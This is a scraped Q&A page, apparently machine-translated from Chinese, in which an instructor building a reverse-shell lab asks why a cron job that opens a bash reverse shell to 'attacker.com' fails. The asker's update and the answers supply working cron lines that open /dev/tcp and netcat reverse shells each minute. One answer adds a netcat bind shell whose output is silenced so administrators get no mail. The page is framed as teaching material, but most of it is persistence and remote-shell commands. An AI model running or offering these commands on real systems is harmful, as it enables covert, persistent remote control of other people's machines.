linux Bash反向shell命令cron作业不工作-我给予了

vsdwdz23  于 2023-10-16  发布在  Linux
关注(0)|答案(3)|浏览(124)

我在一所大学教网络安全,正在写一个关于Netcat和Reverse Shell的实验。我已经创建了一个cron作业,它运行一个连接到我的侦听器的脚本。这样就行了。问题是有太多的指纹,脚本可以删除。实验室的一部分是关于隐形操作的(比如在输入的任何命令前面放一个空格)。
我正在尝试执行此命令。现在的频率并不重要,但最终它将运行在 Boot 和每30分钟。

/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

当从命令行运行时,命令工作并建立反向shell。我不想使用端口80,因为如果学生决定尝试一些愚蠢的事情,我 * 确实 * 希望这个被阻止。另外,下一个实验将讨论iptables如何阻止此端口。
我试过引用。我试过sudo。最后是两个&。最后是一个“和”。对/tcp/路径的进一步限定。我不认为我需要建立什么tty会话它的运行(这将是坚韧的)。cron-run命令在任何情况下都不会成功。

crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
* * * * * /bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1

下面是系统日志

cat /var/log/syslog 

Mar 19 07:42:01 raspberrypi CRON[12921]: (pi) CMD (/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1)
Mar 19 07:42:01 raspberrypi CRON[12917]: (CRON) info (No MTA installed, discarding output)

它看起来没有失灵...就是不管用
所以,对于许多比我聪明的人来说,我做错了什么,我如何让这个命令作为一个cron作业工作(调用脚本不是一个选项)?

**更新:**解决方案是* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1',尽管有两个错误,我仍在解决。

sczxawaw

sczxawaw1#

/dev/tcp反病毒

请注意,* /dev/tcp/host/port * 是一个**主义 *!
cron不会理解他们!
您可以尝试:

* * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker.com/5326 0>&1'

或者使用非bash方式:
使用netcat作为示例:

* * * * * /usr/bin/nc -c /bin/bash\ -i attacker.com 5326 0>&1

(See man nc.traditionalman nc.openbsd

b0zn9rqh

b0zn9rqh2#

我怀疑从命令行传递的argv数组中的内容与来自cron守护进程的内容不匹配。虽然我不能告诉什么是失踪的逃避,这里是一个一般的方法来诊断它:

void main(int argc, char **argv) {
  for( int i=0; i<argc; i++) 
    printf("%d: '%s'\n",i,argv[i])
}

如果你把它编译成一个二进制文件,并在两种情况下用args运行它,你应该看到区别:

./a.out -i >& /dev/tcp/attacker.com/5326 0>&1

对比:

* * * * * /path/a.out -i >& /dev/tcp/attacker.com/5326 0>&1

如果这不是argv中的区别,那么>&0>&1是否不会被命令行bash进程(而不是正在启动的进程)处理并应用于正在运行的bash shell,从而使攻击者二进制文件没有重定向,但其父进程有?
编辑:
F. Hauri提出了一个很好的观点,但你可能想要在你的crotab是:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1'

(or他们可以编辑他们的答案,/path/a.out部分是错误的)
编辑2-捕获输出:

* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/5326 0>&1 >/path/to/logfile'
fcipmucu

fcipmucu3#

* * * * * nc -lvp <LPORT> -e /bin/bash >dev/null 2>&1

这个简单的一行程序每分钟打开一个netcat bind shell,并将所有发送给管理员的邮件静音。

相关问题